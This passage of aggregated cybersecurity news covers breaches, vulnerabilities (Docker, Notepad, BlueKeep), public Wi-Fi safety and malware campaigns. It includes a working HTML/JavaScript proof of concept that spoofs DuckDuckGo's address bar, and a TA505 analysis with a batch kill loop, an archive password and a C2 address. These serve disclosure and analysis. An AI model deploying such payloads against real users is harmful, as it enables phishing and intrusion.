Experts also published a list of IoCs (indicators of compromise) and a free PowerShell-based script that could be used by Windows admins to check whether their systems are infected or not.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – nansh0u malware, hacking)

The post Nansh0u campaign already infected 50,000 MS-SQL and PHPMyAdmin Servers appeared first on Security Affairs.

New Zealand Opposition Behind Budget Info Hack?

Two thousand unauthorized access attempts in 48-hours, that is how New Zealand’s Treasury Secretary in coordination with the National Cyber Security Centre described the budget information record hacking incident that happened this week. New Zealand’s new public spending law dubbed “well-being budget” is expected to be publicly disclosed in full on Thursday, May 30, 2019. But prior to that, the National party which is serving as the opposition partly released snippets of the budget prior to the official release date.

“Following this morning’s media reports of a potential leak of Budget information, the Treasury has gathered sufficient evidence to indicate that its systems have been deliberately and systematically hacked. The Treasury takes the security of all the information it holds extremely seriously. It has taken immediate steps today to increase the security of all budget-related information and will be undertaking a full review of information security processes. There is no evidence that any personal information held by the Treasury has been subject to this hacking,” explained Gabriel Makhlouf, Treasury Secretary.

National Party’s leader, Simon Bridges denied insinuations that the opposition has something to do with the hacking incident, he also accused the administration party of performing an alleged witch-hunt to discredit them. “There has been no hacking under any definition of that word … there has been nothing illegal or even approaching that. We have acted legally, appropriately, without any hacking or anything approaching that by the National Party. Or indeed what Grant Robertson is saying, that’s how we’ve got it, he is wrong. They [the government] are not in control of what they are doing, so they are lashing out and they are having a witch-hunt.” emphasized Bridges.

The government of New Zealand, through its Treasury Department, is still confirming the continuation of the budget disclosure on the same original date as planned prior to the massive hacking incident. The National Party leadership squarely place the blame to the incompetence of the Treasury officials, more particularly of Makhlouf for mishandling government data and him calling the assistance of police as if cybercrime is a typical street crime. The opposition leader refused to explain how did they were able to secure a copy of the well-being budget.

“There’s this potential talk around cybersecurity and so on — I was a minister in charge of cybersecurity for Bill English and what I know is departments like the Treasury, with big organizations, there are attempts at hacking and so on, if not every day, very commonly. I don’t know what the situation with that is, but they wouldn’t have called in the police if that was what they were worried about,” concluded Bridges.

New Zealand’s well-being budget aims to change the fiscal priorities of the government, with stronger focus with funding actions against domestic abuse, better mental health care system and protection against child labor practices due to poverty. With social services taking a lion share of the budget, the government of New Zealand is distancing itself from more economic growth compared to previous years. The administration believes that domestic protection should receive more focus this year.

Also, Read:

Prolific Hacker SandboxEscaper Demos Windows 10 Zero-Day Exploit

Fundamentals Of Making A Hacker Out Of You

Criminals Hack Forum Used for Trading Stolen Credentials

Hackers Inject Scripts in WordPress Live Chat Plugin

Stack Overflow’s Production Systems Accessed by Hackers

 

The post New Zealand Opposition Behind Budget Info Hack? appeared first on .

Google white hat hacker found code execution flaw in Notepad

The popular white hat hacker Tavis Ormandy has announced the discovery of a code execution vulnerability in Microsoft’s Notepad text editor.

The Google Project Zero researcher Tavis Ormandy announced the discovery of a code execution flaw in Microsoft’s Notepad text editor.

Ormandy reported the issue to Microsoft and will wait 90 days according to Google vulnerability policy disclosure before revealing technical details of the flaw.

Of course, Ormandy could also disclose the details of the vulnerability after Microsoft will release a security patch to address the issue.

Ormandy anticipated that the vulnerability is a memory corruption bug and he shared via Twitter an image that demonstrates how to manage a “pop a shell in Notepad.”

The image posted by Ormandy shows that the vulnerability has been exploited to launch a Command Prompt, the expert confirmed he has already developed a “real exploit” for the issue.

Notepad

A message published by Chaouki Bekrar, founder of zero-day broker Zerodium, confirms that the type of issue found by the Google white hat hacker is not uncommon to find. The real surprise, according to Chaouki Bekrar, is to find an expert that report it to Microsoft instead of exploiting it or attempt to sell it.

Stay tuned …

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Notepad, hacking)

The post Google white hat hacker found code execution flaw in Notepad appeared first on Security Affairs.

Using Public Wi-Fi? Your data can be hacked easily! Here’s How…

Public Wi-Fi is easily accessible by everyone, as much as free surfing sounds cool, it is risky as well. Let’s see how your data can be hacked easily.

In the contemporary world of networking, Wi-Fi has become a vital commodity. Wi-Fi are now installed in each and every place regardless of the size of the place; from international airports to small kiosks, you can find an internet connection everywhere. Most of these Wi-Fis are not operating on an individual level but are open for all. Public Wi-Fi is easily accessible by everyone be it customers of the shop or just travelers passing by and they are completely free. This means you can connect to the network and enjoy surfing without paying a single dime.

Threats of Public Wi-Fi

Public Wi-Fi attracts millions of users each year. According to a survey three out of 4 people are connecting to public Wi-Fi at some point or place and that too without giving it a second thought. As much as free surfing sounds cool, it is risky as well. There are multiple threats associated with public Wi-Fi as it is open networking and can be accessed by anyone, and this anyone even includes cybercriminals. Some common threats associated with public Wi-Fi are listed here for warning users how insecure it could be:

  • Hackers and Predators

Public Wi-Fi and hotspots are the favorite hubs of hackers and predators. With public Wi-Fi, all the data that you send and receive is open for anyone to peek in. This data may include your personal and secretive details like emails, social media accounts, passwords, bank details, and other crucial stuff. The hackers act as the middle man between you and your designated sites and record essential details of your accounts. These details can be later used for any unauthorized or illegal purpose.

  • Device Hijacking

Hackers and other cybercriminals are smarter than you think. They not only keep an eye on your online activities but also look out for ways to invade your device. If the file sharing option of your device is turned on you are most likely to receive various system up gradation files to run. When you are on a public Wi-Fi, often these files are malware; a kind of virus that hijacks your device and allow cybercriminals to access all your offline data saved in your device.

  • Malicious Networks

When you are out in the streets or are in public places, there are various public Wi-Fis approaching your device. Some of these Wi-Fis are secured with a password while others are just open for all. The open public Wi-Fi is an actual threat as it can be created by bad guys with some wrong intentions. When your device is connected to a suspicious network, the hackers get hold of your device. They can not only peek into your device but can also use your device for any illegal purpose. You will not even get any notification of activities carried out through our device and stay ignorant.

  • Cookie Theft

Cookie theft is one of the major risks of using unencrypted sites. The sites that do not have SSL (Secure Sockets Layer) connection are quite vulnerable and cookies from these sites can be accessed easily by anyone. The risk of using these sites increases to a greater extent when you are on a public Wi-Fi as it provides zero protection against data theft.

  • Spying and Snooping

Spying and keeping track of any user`s activity becomes a lot easier with public Wi-Fi. There are small hardware devices known as packet sniffer or a packet analyzer that is often installed by service providers to monitor the traffic on the network. But setting up these devices is very easy and can be installed by anyone making the task of spies and detectives easier. Data obtained from these devices reveal the statistics of all your online activities carried out through the network and can put you in danger.

  • Propagating of Viruses

Public Wi-Fi often serves as the medium of propagating viruses. There are advanced viruses, known as Computer Worms that propagates really fast through any network. Unlike the classical computer viruses that require a particular program to run, these worms can infest any device which is on the same network as the affected one. Since on public Wi-Fi, a large number of people are simultaneously connected to the same network, there are very high chances of your device to become a victim.

Public WI-FI

Tips to Stay Safe on Public Wi-Fi

Staying safe on the internet is not an easy task and this task becomes more challenging while you are using public Wi-Fi. Free Wi-Fi has its own temptations and at some instances, it becomes unavoidable to benefit from it. Though public Wi-Fi can never be completely secure, there are few tips that will assist you in making your online presence less vulnerable.

  • Enable Wi-Fi Only When Needed

Always keep your device Wi-Fi turned off when you are in public places and enable it only when needed. This may seem like an unnecessary hassle for frequent internet users but it is a mandatory thing to do while in public. If your device Wi-Fi is turned on, it can catch signals from all the available Wi-Fi in your surroundings and will automatically get connected to any open public Wi-Fi. Your device is at constant risk of connecting with malicious networks and getting affected by Worms when it’s Wi-Fi is active all the time.

  • Never Connect with Unknown Wi-Fi

Password protected public Wi-Fi are a bit safer than the open public Wi-Fi and are better to opt for. When a Wi-Fi is protected by a password it ensures that only authorized people can get access to the network and reduces the chances of having hackers on the same network. But if you really need to get connected to an open public Wi-Fi always confirm the name of the Wi-Fi with relevant people around. All the rogue Wi-Fi hotspot usually use similar names as the actual business Wi-Fi and you can easily fell prey to them if you are not cautious.

  • Browse Safely

You must always be cautious while browsing any site on the internet as it is a world full of scams and cons. The risk turns multifold when you are using public Wi-Fi to access the unauthorized site. All the sites that are authorized and provide data encryption begin with HTTPS. These sites have SSL connection and are marked by a lock sign in the address bar. Sites without SSL connection do not take any responsibility of data shared through their sites which is definitely a risk factor and this threat increases if your Wi-Fi connection is unsafe too.

  • Be Vigilant While Sharing Information

When you are on public Wi-Fi, all the data transactions to and fro your device is vulnerable to spying and snooping. Be vigilant about what you share while on public Wi-Fi and never carry out any important transaction through open networks. Remember your bank details and crucial business documents should not be risked due to mere negligence.

Also, limit your social media surfing through public hotspots as it paved the way for predators to your personal information. Logging in through a public network also provides cybercriminals easier access to our account details and password and make your accounts vulnerable to hacking. To stay safe, log in to your accounts only if needed and sign out as soon as your task is done.

  • Opt for VPN

VPN is the safest mode of surfing the internet and provides the best cybersecurity. It is a Virtual Private Network that allocates you an anonymous proxy that is usually located at a different place than your current location. It allows you to camouflage your actual identity and geographical location and keeps you safe from predators and spies.

VPN also provides an encrypted tunnel for all your online transactions and encode them in a way that nobody can access any piece of information during the transaction from one end to another. It eliminates all chances of peeking and snooping by any means.

Virtual Private Network also creates a shield between your device and incoming traffic and keeps malware and viruses at bay. Though it’s usually a paid service it is worth investing in.

  • Secure Your Device

As much as your connection needed to be secure, your device needs safety shields too. Protect your device by enabling the firewall on your device. It’s pop up notifications may be annoying but it will serve the purpose of protective shield for your device against data based malware threats. Even if you prefer to keep your device firewall turned off most of the time, enable it at least while using public Wi-Fi.

Anti-virus and anti-malware software is a must for your device security. It protects your device from invading viruses and alerts you if there is any suspicious activity in your device. Investing in an updated version of anti-virus software becomes more crucial if you use public Wi-Fi quite often on your device.

  • Forget the Network

Whenever you connect with any public Wi-Fi remove the Wi-Fi and password from your device when you leave the place. Saved Wi-Fi is usually auto connected when comes in contact with the device again without alerting you and this may become a threat for your device security.

To Conclude

Public Wi-Fi cannot be avoided completely. They provide you with the facility to connect with the word while on the go and without paying any money. This free service is available at all places from educational institutes to institutional buildings. Whether you are out of your home country for business purposes or enjoying vacations abroad, free public Wi-Fi is certainly a blessing.

There are a number of threats associated with public Wi-Fi especially the ones without any password protection but you can keep yourself safe by following simple precautionary measures. These safety tips protect you from the general tricks and scams of hackers. But if you are a frequent public Wi-Fi user you must invest in paid VPN and authentic anti-virus software for complete security of your device and online transactions.




If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

About Author:

About Writer: Susan Alexandra is is a cybersecurity and privacy enthusiast. She is a small business owner, traveler and investor of cryptocurrencies. Susan’s inbox is open for new ideas and stories, you can share the story ideas to susanalexandra67(at)gmail(dot)com

Pierluigi Paganini

(Security Affairs – Public Wi-Fi, hacking)

The post Using Public Wi-Fi? Your data can be hacked easily! Here’s How… appeared first on Security Affairs.

All Docker versions affected by an unpatched race condition issue

A race condition flaw that could be exploited by an attacker to read and write any file on the host system affects any versions of Docker. 

Experts found a race condition vulnerability in any versions of Docker, the vulnerability could be exploited by an attacker to read and write any file on the host system.

Technically the flaw, tracked as CVE-2018-15664, is a time-to-check-time-to-use (TOCTOU) flaw caused by changes in a system between the checking of a condition (i.e. authorization check) and the use of the results of that check.

“In Docker through 18.06.1-ce-rc2, the API endpoints behind the ‘docker cp‘ command are vulnerable to a symlink-exchange attack with Directory Traversal, giving attackers arbitrary read-write access to the host filesystem with root privileges, because daemon/archive.go does not do archive operations on a frozen filesystem (or from within a chroot).” reads the description for this issue.

docker logo-696x364

The issue resides in the FollowSymlinkInScope function that allows resolving a specified path in a secure way. FollowSymlinkInScope is a wrapper around evalSymlinksInScope that returns an absolute path. This function handles paths in a platform-agnostic manner.

“If you’re not familiar with FollowSymlinkInScope, its job is to take a path and safely resolve it as though the process was inside the container. After the full path has been resolved, the resolved path is passed around a bit and then operated on a bit later (in the case of ‘docker cp’ it is opened when creating the archive that is streamed to the client).” reads the advisory published by SUSE. “As you may notice, if an attacker can add a symlink component to the path after the resolution but before it is operated on, then you could end up resolving the symlink path component on the host as root. In the case of ‘docker cp’ this gives you read and write access to any path on the host.”

The process leverages the ‘docker cp’ utility to copy content between a container and the local filesystem.

“As far as I’m aware there are no meaningful protections against this kind of attack (other than not allowing “docker cp” on running containers — but that only helps with his particular attack through FollowSymlinkInScope). Unless you have restricted the Docker daemon through AppArmor, then it can affect the host filesystem,” continues the advisory.

A possible attack scenario sees an attacker to be active within a container while the host administrator is running docker cp to copy data in or out of the container.

Aleksa Sarai, senior software engineer who discovered the issue, proposes as mitigation the modification of the ‘chrootarchive‘ to run archive operations in a secure environment where the root is the container ‘rootfs.’

“The most complete solution to this problem would be to modify chrootarchive so that all of the archive operations occur with the root as the container rootfs (and not the parent directory, which is what causes the vulnerability since the parent is attacker-controlled),” said Sarai.

“Unfortunately, changes to this core piece of Docker are almost impossible (the TarUntar interface has many copies and reimplementations that would all need to be modified to be able to handle a new ‘root’ argument).”

The changes impact a core part of Docker, this means that it could be not feasible.

Another mitigation consists of pausing the container when accessing the filesystem, this option could give protection against the more basic attacks that exploit the issue.

At the time of writing, a security patch has been submitted upstream and is currently under review.

Aleksa Sarai also developed two scripts to trigger the vulnerability and get respectively read and write access to the host system.

“Attached is a fairly dumb reproducer which basically does a RENAME_EXCHANGE of a symlink to “/” and an empty directory in a loop, hoping to hit the race condition. Then our “user” attempts to copy a file from the path repeatedly.” explained the expert. “You can call it like this (note that since this requires exploiting a race condition, only a small percentage of the attempts succeed — however if I had made my reproducer a bit more clever about how quickly it does the RENAME_EXCHANGE it could be more likely to hit the race).”

The expert explained that the success rate for his reproducer is 0.6%, that could appear as bad, but using it for a time frame of a dozen of seconds could allow reaching the success.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Docker, hacking)

The post All Docker versions affected by an unpatched race condition issue appeared first on Security Affairs.

TA505 is expanding its operations

An attack against an Italian organization lead the experts at Yoroi-Cybaze ZLab to shed the light on ongoing operations attributed to TA505.

Introduction

In the last few days, during monitoring activities, Yoroi CERT noticed a suspicious attack against an Italian organization. The malicious email contains a highly suspicious sample which triggered the ZLAB team to investigate its capabilities and its possible attribution, discovering a potential expansion of the TA505 operation. The threat group is also known for its recent attack campaign against Bank and Retail business sectors, but the latest evidence indicates a potential expansion of its criminal operation to other industries too.

Technical Analysis

Hash0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc273
ThreatDropper
Brief DescriptionExcel file with malicious macro
Ssdeep3072:Mc38TehYTdeHVhjqabWHLtyeGxml8/dgzxXYhh3vVYwrq 8/P5HKuPF1+bkm13Kkf:B38TehYTdeHVhjqabWHLty/xml8/dgNr

Table 1. Information about initial dropper

The intercepted attack starts with a spear-phishing email embedding a spreadsheet. The document is weaponized with malicious macro code triggered when the user opens the document to see the content under the obfuscated view.

Figure 1. XLS document

To understand its capabilities, the macro code has been isolated and analyzed in detail. Part of the macro’s content is shown in the following figure.

Figure 2. Part of extracted macro

Surprisingly, the source code is composed by more than 1600 lines of code and it is highly obfuscated. Paying more attention during the code analysis, we discovered that it is full of junk instructions used to declare and initialize variables never used, as shown in Figure 2. Only a small portion of this code is actually used to start the infection, the rest is just junk code.

Figure 3. Example of junk instructions used in macro

Once the macro is executed, the malware downloads two files from “kentona[.su”, using an SSL encrypted communication, and stores them in “C:\Users\Public” path: “rtegre.exe” and “wprgxyeqd79.exe”.

Hashaafa83d5e0619e69e64fcac4626cfb298baac54c7251f479721df1c2eb16bee7
ThreatGeneric
Brief DescriptionTrojan/Downloader (Executable file)
Ssdeep12288:3gL3qJxG5hfNV6oYYbDRcY4KhbmwPMCchbjBxwhrVm HAyzNkyRJK7hRMCQ:3mqkhfzYZY4kmgsbdm2HAENk0K7Dm

Table 2. Information about “rtegre.exe” downloaded from “kentona[.su”

Hash6f1a8ee627ec2ed7e1d818d32a34a163416938eb13a97783a71f9b79843a80a2
ThreatTrojan
Brief DescriptionSFX (self-extracting archive) (Executable file)
Ssdeep49152:sIWB74MncmEWy4i1LkjoAwG2PI/mfqtftvMKcr+7Ao95 xQW1vB38PELaacVzWTV3:sICtHsJoMAwG

Table 3. Information about “wprgxyeqd79.exe” (SFX) downloaded from “kentona[.su”

Figure 4. Files contained in “wprgxyeqd79.exe” (SFX)

The “wprgxyeqd79.exe” sample actually is a Self Extracting Archive (SFX/SFA) containing four files designed to be extracted in the %TEMP% folder. After that, it executes “exit.exe” which launches the “i.cmd” batch script.  

Figure  5. “i.cmd” script contained in “pasmmm.exe”

This new script performs a ping to “www[.cloudflare[.com” for three times with a delay of 3000ms, testing the connectivity of the victim machine. If the host is successfully reached, the script renames a file named “kernel.dll”, obviously not the real one, in “uninstall.exe”, another misleading name. Then it invokes the renamed executable and runs it passing a series of parameter: “uninstall.exe x -pQELRatcwbU2EJ5 -y”

These parameters are needed to self-decrypt the “uninstall.exe” file which is again another SFX archive. The “-p” parameter, indeed, specify the password of the archive to be extracted. The crucial file, at this point of the infection, is the SFX executable named “uninstall.exe”. It has a structure similar to previous “wprgxyeqd79.exe” file: two of their files have the same name, but the content of this new SFX is extracted in the “%ALLUSERSPROFILE%\Windows Anytime Upgrade” directory.

Figure 6. Files contained in “uninstall.exe” (SFX)

Another time, the execution flow moves from “exit.exe to “i.cmd”. The script is quite different from the previous one: it guarantees its persistence on the victim machine through the setting of “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” registry key, creating a new entry named “Windows Anytime Upgrade” which points to “winserv.exe”, just stored into the same folder. Thus, the script provides to run “winserv.exe”.

Figure 7. “i.cmd” script contained in “uninstall.exe”

An interesting part of the script is the continuous killing of every “rundll32.exe” process running into the victim machine, generates a huge amount of noise, as visible in the following process explorer view.

:Repeat
taskkill /f /im “rundll32.exe” || goto :Repeat

Figure 8. List of malware’s processes

Anyway, just before the kill loop, the real malicious payload is executed: the  “winserv.exe” file. Analyzing it in depth, we discover it actually is the RMS (Remote Manipulator System) client by TektonIT, encrypted using the MPress PE compressor utility, a legitimate tool, to avoid antivirus detection.

Figure 9. Information about MPress packer used in “winserv.exe” payload

TektonIT RMS acts as a remote administration tool, allowing the attacker to gain complete access to the victim machine. Together with the RMS executable, there is another file named “settings.dat”containing the custom configuration prepared by the attacker. It contains information like:

  • Server address and port the client will connect to
  • The password chosen by the attacker for the remote access
  • The ID associated to the victim client

All these information are automatically loaded by the RMS executable and firstly stored in the registry key “HKCU\Software\tektonik\Remote MANIPULATOR System\Host\parameters”. At the next startup, the software will directly load the configuration from the just created key.

Figure 10. Registry key set by “winserv.exe” (on the left); “settings.dat” file (on the right)

The client establishes a new connection with the remote command and control server hosted on a Bulgarian remote host 217.12.201.159, part of a Virtual Dedicated Server subnet of the AS-21100, operated by ITL LLC.

Figure 11. C2’s parameters

The attack is composed by a complex flow we synthesize in the following scheme:

Figure 12. Complete infection chain

The TA505 Connection

After the reconstruction of the full infection chain, we noticed strong similarities with a recent spear-phishing attack campaign against an unspecified US retail company. The attack, as stated by CyberInt, leveraged a command and control server located in Germany related to the TA505 actor: a very active group involved in cyber-criminal operation all around the world, threatening a wide range of high profile companies, active since 2014.

Figure 13. Comparison between infection chains

The comparison of the infection chains reveals in both cases the attacker used a couple of SFX stages to deploy the “RMS” software: a legitimate remote administration tool produced by the Russian company “TektonIT”. The tool is able to grant remote access and full, direct control of the infected machine to the group. Also, some code pieces are directly re-used in the  analyzed campaigns, such as the “i.cmd” and “exit.exe” files, and, at the same time, some new components have been introduced, for instance the “rtegre.exe” and the “veter1605_MAPS_10cr0.exe” file.

During the analysis, we also noticed the “veter1605_MAPS_10cr0.exe” file slightly changed run after run, a few hours after the initial discovery the infection chain dropped it with different icons, different suffix, from “cr0” to “cr24”, and appendix from “veter1605_” to “veter2005_”. This may indicate the campaign is still ongoing.

Conclusion

The TA505 group is one of the most active threat groups operating since 2014, it has traditionally targeted Banking and Retail industries, as we recently documented during the analysis of the “Stealthy Email Stealer” part of their arsenal. The peculiarity of this recent attack wave is it actually hit a company not strictly in the Banking or Retail sector, as they recently did, suggesting the threat group could be potentially widening their current operations.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog.

https://blog.yoroi.company/research/gobrut-a-new-golang-botnet/

Pierluigi Paganini

(SecurityAffairs – TA505, hacking)

The post TA505 is expanding its operations appeared first on Security Affairs.

News aggregator Flipboard disclosed a data breach

The news aggregator Flipboard announced that it suffered a breach, unauthorized users had access to some databases storing user account information.

The news and social media aggregator Flipboard disclosed on Tuesday that it suffered a breach, unauthorized users had access to some databases storing user information.

Hackers had access to the company systems between June 2, 2018, and March 23, 2019, and again on April 21-22, 2019. On April 23, the internal staff noticed suspicious activity in its infrastructure.

“We recently identified unauthorized access to some of our databases containing certain Flipboard users’ account information, including account credentials,” reads the incident notice published by Flipboard. “In response to this discovery, we immediately launched an investigation and an external security firm was engaged to assist. Findings from the investigation indicate an unauthorized person accessed and potentially obtained copies of certain databases containing Flipboard user information between June 2, 2018 and March 23, 2019 and April 21 – 22, 2019.”

Flipboard data breach

Flipboard have more than 145 million users and hackers have exfiltrated their data. Stolen records include names, usernames, password hashes, email addresses, and for some users digital tokens used to access Flipboard through third-party services.

Flipboard said that most of the passwords were hashed with bcrypt, while the passworts for users that have not logged into their account since March 14, 2012, were protected with SHA-1 hashing algorithm and uniquely salted.

Flipboard has not found any evidence the hackers accessed third-party accounts connected to users’ accounts, anyway as a precaution, the company replaced or deleted all digital tokens. At the time it is not clear the extent of the breach, anyway, the company forced a password reset for all its users.

The news aggregator pointed out that it does not collect users’ data, this means that the data breach did not expose sensitive data.

“Notably, Flipboard does not collect from users, and this incident did not involve, government issued IDs (such as Social Security numbers or driver’s license numbers), or payment card, bank account, or other financial information.” continues the security notice.

Flipboard reported the incident to the authorities and hired a security firm to help with the investigation.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post News aggregator Flipboard disclosed a data breach appeared first on Security Affairs.

DuckDuckGo Address Bar Spoofing

The DuckDuckGo Privacy Browser application 5.26.0 for Android allows address bar spoofing via a setInterval call, as demonstrated by reloading every 50 ms.

Technical Observation: A browser that’s scoring in the 50,00,000+ tier of Android download.It was observed that the DuckDuckGo privacy browser ominibar can be spoofed by a crafted javascript page spoofing `setInterval` function and reloading the URL in every 10 to 50 ms.

Proof of concept: (Gist)

<html><body>
<title>DuckDuckGo — Privacy, simplified.</title>
<head><style>
p.b {
    font-family: Arial, Helvetica, sans-serif;
    }
</style></head><p class="b"><body bgcolor="#5DBCD2">
<h1 style="text-align:center;">We defintiely store your <br> personal information. Ever.</h1>
<p style="text-align:center;">Our privacy policy is simple: we collect and share any of your personal 
information to 3rd parties.</p> </p><img src="https://duckduckgo.com/assets/onboarding/bathroomguy/4-alpinist-v2.svg"> <script> function fakefuntion() { location = "https://duckduckgo.com/" } setInterval("fakefuntion()", 50); </script></body></html>

The actual magic happens at `fakefunction()` above-crafted javascript file loads the real www.duckduckgo.com in a loop of every 50 ms whereas the inner HTML can be modified accordingly.

DuckDuckGo flaw

The above PoC shows the demonstration of the successful attack.
Timeline:
This issue was submitted to DuckDuckGo team via HackerOne on Oct 31st, 2018, DuckDuckGo rewarded with a swag on Nov 13th, 2018 but the issue was closed without a fix which says “team doesn’t view it as a serious issue” and report was marked as informative. Further CVE-2019-12329 was assigned to this issue.

About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj)

Original post at:

https://www.inputzero.io/2019/05/duckduckgo-address-bar-spoofing.html


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Address Bar Spoofing, hacking)

The post DuckDuckGo Address Bar Spoofing appeared first on Security Affairs.

Internet scans found nearly one million systems vulnerable to BlueKeep

Roughly one million devices are vulnerable to attacks exploiting the BlueKeep Windows vulnerability and hackers are ready to hit them.

Yesterday I reported the discovery made by experts at GreyNoise that detected scans for systems vulnerable to the BlueKeep (CVE-2019-0708) vulnerability.

The scans were first detected on May 25, 2019, experts explained that a single threat actor launched them from the Tor network to hide their identities.

Bad Packets researchers also observed scanning activity associated with the BlueKeep, most of the requests originated from the Netherlands, Russia. and China.

The vulnerability, tracked as CVE-2019-0708, impacts the Windows Remote Desktop Services (RDS) and was addressed by Microsoft with May 2019 Patch Tuesday updates. BlueKeep is a wormable flaw that can be exploited by malware authors to create malicious code with WannaCry capabilities.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

Many security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. Windows 7 and Server 2008 users can prevent unauthenticated attacks by enabling Network Level Authentication (NLA), and the threat can also be mitigated by blocking TCP port 3389.

Experts at the SANS Institute observed two partial exploits that are publicly available. Chaouki Bekrar, the founder of zero-day broker firm Zerodium, explained that the flaw can be exploited remotely by an unauthenticated user to gain access to a device with SYSTEM privileges. Researchers at McAfee developed a PoC exploit that could be exploited to get remote code execution.

Other experts also announced to have successfully developed exploits for BlueKeep, including KasperskyCheck Point, and MalwareTech.

Now the popular expert Robert Graham has scanned the Internet for vulnerable systems. He discovered more than 923,000 potentially vulnerable devices using the masscan port scanner and a modified version of rdpscan,  

The initial scan executed with masscan lasted a couple of hours and allowed the expert to find all the devices running Remote Desktop, roughly 7,629,102 results.

“However, there is a lot of junk out there that’ll respond on this port. Only about half are actually Remote Desktop.” explained Graham.
Masscan only finds the open ports, but is not complex enough to check for the vulnerability. Remote Desktop is a complicated protocol. A project was posted that could connect to an address and test it, to see if it was patched or vulnerable. I took that project and optimized it a bit, rdpscan, then used it to scan the results from masscan. It’s a thousand times slower, but it’s only scanning the results from masscan instead of the entire Internet.”

The scan revealed 923,671 potentially vulnerable systems, likely hackers will launch a massive offensive in the next weeks.

“The upshot is that these tests confirm that roughly 950,000 machines are on the public Internet that are vulnerable to this bug. Hackers are likely to figure out a robust exploit in the next month or two and cause havoc with these machines. ” Graham added.

Below the detailed results of the scans conducted by the expert:

  • 1447579  UNKNOWN – receive timeout
  • 1414793  SAFE – Target appears patched
  • 1294719  UNKNOWN – connection reset by peer
  • 1235448  SAFE – CredSSP/NLA required 
  • 923671  VULNERABLE — got appid 
  • 651545 UNKNOWN – FIN received
  • 438480  UNKNOWN – connect timeout 
  • 105721  UNKNOWN – connect failed 9
  • 82836  SAFE – not RDP but HTTP 
  • 24833  UNKNOWN – connection reset on connect   
  • 3098  UNKNOWN – network error   
  • 2576  UNKNOWN – connection terminated

Summarizing, over 1.4 million machines have been patched and 1.2 million devices refused any unauthenticated connection.

Let’s close confirming the availability of the micropatch for the BlueKeep vulnerability that was released by experts at 0patch that can be deployed by administrators to protect always-on servers.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – BlueKeep, hacking)

The post Internet scans found nearly one million systems vulnerable to BlueKeep appeared first on Security Affairs.

ScarCruft, An Anti-North Korean Hacking Team

Malware authors continue to find ways to operate at a more sophisticated level, especially Advanced Persistent Threats (APT). Known as ScarCruft team, as exposed by Kaspersky Lab for establishing espionage campaigns using Bluetooth exploits. ScarCruft focuses its attention with breaking into smartphones of government officials and businessmen operating in the Korean peninsula through Bluetooth. The operation apparently started in 2018, with the use of a specially designed modular malware, composed of many modules in its goal of evading detection.

A Windows-based operation also exists, where espionage takes place once the group establishes a connection to the target server and weaponized a tool that exploits CVE-2018-8120 in order to render the Windows Account Control useless.“The final payload created by the aforementioned process is a well known backdoor, also known as ROKRAT by Cisco Talos. This cloud service-based backdoor contains many features. One of its main functions is to steal information. Upon execution, this malware creates 10 random directory paths and uses them for a specially designated purpose. The malware creates 11 threads simultaneously: six threads are responsible for stealing information from the infected host, and five threads are for forwarding collected data,” explained Kaspersky Labs in their official blog.

The Windows version of the malware is a full-fledged backdoor suite, capable of connecting with its command and control server. The C&C once receiving the new information instructs the malware to gather information based on the author’s chosen parameters, while keeping the code updated remotely by the malware author, useful for bypassing antimalware software. With system-level access, the malware can execute Windows-supported commands, especially taking advantage of the PowerShell features that can keep itself from being deleted after a system reboot.

Once a persistent infection is established, the malware will then download a Bluetooth harvester module which will probe all mobile devices that connects to the Windows PC. It will then have the man-in-the-middle capabilities, deliberately checking the information that flows between the infected PC and the mobile device, mostly for espionage purposes. “We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester. This malware is responsible for stealing Bluetooth device information. It is fetched by a downloader, and collects information directly from the infected host. This malware uses Windows Bluetooth APIs to find information on connected Bluetooth,” added Kaspersky Labs.

The researchers have no conclusive evidence that the ScarCruft team is associated with North Korea, given that the hermit country’s diplomatic agency was also a victim. A Hong Kong government diplomatic agency which has strong ties with North Korea was also reported of falling for the same espionage campaign. An unnamed public agency in Russia also had signs of malware infection that were similar to the one reported by the Hong Kong and North Korean agencies, showing the threat actor’s motivation to focus their campaign against someone connected with diplomatic ties between the mentioned nations.

“The ScarCruft has shown itself to be a highly-skilled and active group. It has a keen interest in North Korean affairs, attacking those in the business sector who may have any connection to North Korea, as well as diplomatic agencies around the globe. Based on the ScarCruft’s recent activities, we strongly believe that this group is likely to continue to evolve,” concluded Kaspersky Labs.

Related Resource:

North Korean Spy Charged For 2014 Sony Pictures Hack

North Korean Hackers Swindles over $1 billion

North Korean Hackers Stole Cryptocurrency Funds From South Korea

Over 100 Targets in US Hit By North Korean Hackers

The post ScarCruft, An Anti-North Korean Hacking Team appeared first on .

Shade Ransomware is very active outside of Russia and targets more English-speaking victims

Experts at PaloAlto Networks spotted a new Shade ransomware campaigns targeting news countries, including in the U.S. and Japan.

